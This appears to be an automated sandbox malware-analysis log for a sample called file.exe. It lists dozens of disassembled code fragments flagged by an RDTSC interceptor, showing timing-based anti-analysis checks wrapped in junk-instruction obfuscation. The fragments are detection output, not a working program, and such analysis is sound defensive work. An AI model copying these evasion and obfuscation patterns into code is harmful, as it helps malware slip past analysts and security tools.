Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB1DB second address: EAB1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB603 second address: EAB61A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62283h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAB61A second address: EAB63F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4FB8FDD509h 0x00000008 jmp 00007F4FB8FDD501h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4FB8FDD4F6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB1D second address: EADB38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4FB8D6227Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB38 second address: EADB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 nop 0x00000007 mov cx, B058h 0x0000000b push 00000000h 0x0000000d or dword ptr [ebp+122D2D12h], edx 0x00000013 call 00007F4FB8FDD4F9h 0x00000018 js 00007F4FB8FDD4FEh 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB5D second address: EADB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB68 second address: EADB8C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FB8FDD502h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB8C second address: EADB90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB90 second address: EADB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB9A second address: EADB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADB9E second address: EADC56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F4FB8FDD4FFh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push esi 0x00000013 jmp 00007F4FB8FDD506h 0x00000018 pop esi 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D2FECh], ebx 0x00000020 push 00000003h 0x00000022 mov di, 70B6h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007F4FB8FDD4F8h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 mov esi, dword ptr [ebp+122D286Ch] 0x00000048 mov ecx, dword ptr [ebp+122D2924h] 0x0000004e push 00000003h 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007F4FB8FDD4F8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a movzx edx, si 0x0000006d mov dword ptr [ebp+122D2D64h], ebx 0x00000073 call 00007F4FB8FDD4F9h 0x00000078 jbe 00007F4FB8FDD508h 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F4FB8FDD4FAh 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADC56 second address: EADC66 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F4FB8D62276h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADC66 second address: EADC70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADC70 second address: EADCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F4FB8D62281h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jc 00007F4FB8D62289h 0x00000018 jng 00007F4FB8D62283h 0x0000001e jmp 00007F4FB8D6227Dh 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4FB8D62286h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADCC5 second address: EADCCF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADCCF second address: EADD05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub edi, 25CE4521h 0x00000010 lea ebx, dword ptr [ebp+124529E4h] 0x00000016 mov cx, 95E7h 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4FB8D6227Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADEB7 second address: EADEBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADEBD second address: EADF1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov ecx, edi 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D2393h], edi 0x00000018 push 3513392Dh 0x0000001d ja 00007F4FB8D6227Ah 0x00000023 xor dword ptr [esp], 351339ADh 0x0000002a jl 00007F4FB8D6227Ch 0x00000030 mov dword ptr [ebp+122D2D02h], edi 0x00000036 push 00000003h 0x00000038 mov cl, 90h 0x0000003a push 00000000h 0x0000003c mov dx, cx 0x0000003f push 00000003h 0x00000041 mov edx, dword ptr [ebp+122D2934h] 0x00000047 or ecx, 45EA8FDAh 0x0000004d push B131A282h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EADF1E second address: EADF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA1599 second address: EA15A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA15A3 second address: EA15A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA15A8 second address: EA15B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA15B5 second address: EA15BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD468 second address: ECD46D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD98B second address: ECD99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4FB8FDD4FAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECD99A second address: ECD9C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Eh 0x00000007 jmp 00007F4FB8D62282h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 jns 00007F4FB8D62276h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE080 second address: ECE08D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE08D second address: ECE0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D6227Dh 0x00000009 jng 00007F4FB8D62276h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0AC second address: ECE0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F4FB8FDD4FFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0C6 second address: ECE0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE0CA second address: ECE0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE360 second address: ECE369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE4C1 second address: ECE4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE4C7 second address: ECE4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE4D3 second address: ECE4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4FB8FDD4F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE4DD second address: ECE4F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jno 00007F4FB8D62276h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9FB53 second address: E9FB59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9FB59 second address: E9FB82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 jg 00007F4FB8D6227Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECE668 second address: ECE677 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD4F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ECEB9D second address: ECEBAD instructions: 0x00000000 rdtsc 0x00000002 je 00007F4FB8D62276h 0x00000008 jns 00007F4FB8D62276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED24E5 second address: ED24EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED24EB second address: ED2510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F4FB8D62286h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F4FB8D62276h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2510 second address: ED2514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E98E8E second address: E98E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB0CC second address: EDB0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FB8FDD501h 0x0000000c jc 00007F4FB8FDD4F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB0EC second address: EDB109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 je 00007F4FB8D6228Ch 0x0000000c jp 00007F4FB8D62278h 0x00000012 pushad 0x00000013 jl 00007F4FB8D62276h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB3BE second address: EDB3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8FDD508h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDBB0A second address: EDBB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDBB10 second address: EDBB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4A8 second address: EDC4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8D62276h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4B3 second address: EDC504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5EA31700h 0x00000010 jmp 00007F4FB8FDD506h 0x00000015 push 93C47211h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4FB8FDD504h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD2D3 second address: EDD2E5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8D62276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD2E5 second address: EDD2EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD4F0 second address: EDD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6BD second address: EDD6CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6CB second address: EDD6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6D8 second address: EDD6EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FB8FDD4FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDE48D second address: EDE4D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edi 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D2F78h], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F4FB8D62278h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov esi, 2D405D54h 0x00000039 movsx edi, dx 0x0000003c push eax 0x0000003d push edi 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90790 second address: E90794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE1A3A second address: EE1A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE2EA4 second address: EE2EA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE4499 second address: EE44B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4FB8D62278h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F4FB8D62278h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE44B3 second address: EE44BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8FDD4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9C400 second address: E9C404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE4D5A second address: EE4D5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9986 second address: EE999A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE999A second address: EE99AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD501h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEAEE0 second address: EEAF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c jg 00007F4FB8D6227Ch 0x00000012 and edi, 1FE6BDE7h 0x00000018 push 00000000h 0x0000001a or bl, FFFFFFF9h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F4FB8D62278h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 and ebx, dword ptr [ebp+124785BCh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F4FB8D62287h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEAF3C second address: EEAF42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9594B second address: E9594F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE5D1 second address: EEE5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE5D7 second address: EEE5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF764 second address: EEF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF76A second address: EEF787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62289h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF787 second address: EEF78B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE88C second address: EEE890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF78B second address: EEF821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jnp 00007F4FB8FDD4FAh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 call 00007F4FB8FDD509h 0x0000001c and edi, 067E9659h 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F4FB8FDD4F8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jns 00007F4FB8FDD4FCh 0x00000045 xchg eax, esi 0x00000046 je 00007F4FB8FDD50Ch 0x0000004c jmp 00007F4FB8FDD506h 0x00000051 push eax 0x00000052 pushad 0x00000053 jns 00007F4FB8FDD4FCh 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE890 second address: EEE89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF821 second address: EEF825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0916 second address: EF091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF091B second address: EF0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0921 second address: EF0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0A6D second address: EF0A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF38BA second address: EF38BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
